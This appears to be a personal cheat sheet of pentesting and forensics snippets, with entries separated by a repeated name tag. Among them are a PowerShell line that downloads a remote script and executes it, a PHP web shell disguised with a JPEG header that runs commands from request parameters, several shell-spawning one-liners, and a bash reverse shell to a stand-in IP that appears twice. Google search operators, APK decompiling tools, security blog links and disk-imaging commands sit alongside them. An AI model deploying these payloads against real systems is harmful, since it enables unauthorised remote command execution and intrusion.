SleepyLctl

########################################
Execute PS script remotely
########################################

iex ((new-object net.webclient).downloadstring('https://url/install.ps1'))

SleepyLctl

APK to java 
-- dex2jar + jd-gui
-- jadx
-- apktool?

https://stackoverflow.com/questions/1249973/decompiling-dex-into-java-sourcecode

SleepyLctl

intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
info:
movie:

SleepyLctl

ÿØÿà
<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>

SleepyLctl

The list below shows some of the blogs and feeds that might be useful to the security analyst when investigating incidents.
•	http://blogs.cisco.com/security/
•	http://malware-traffic-analysis.net/
•	http://malware.dontneedcoffee.com/
•	http://myonlinesecurity.co.uk/
•	http://krebsonsecurity.com/
•	http://blog.dynamoo.com/
•	http://sanesecurity.blogspot.co.uk/
•	http://blog.0x3a.com/
•	http://blog.trendmicro.com/trendlabs-security-intelligence/

SleepyLctl

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

SleepyLctl

Shell Spawning

    python -c 'import pty; pty.spawn("/bin/sh")'

    echo os.system('/bin/bash')

    /bin/sh -i

    perl —e 'exec "/bin/sh";'

SleepyLctl

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:

SleepyLctl

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:

SleepyLctl

Make an image of the device first
#################################
# dd if=/dev/target_partition of=/home/user/partition.image



fdisk -l
# fsck

# strings /dev/sda | grep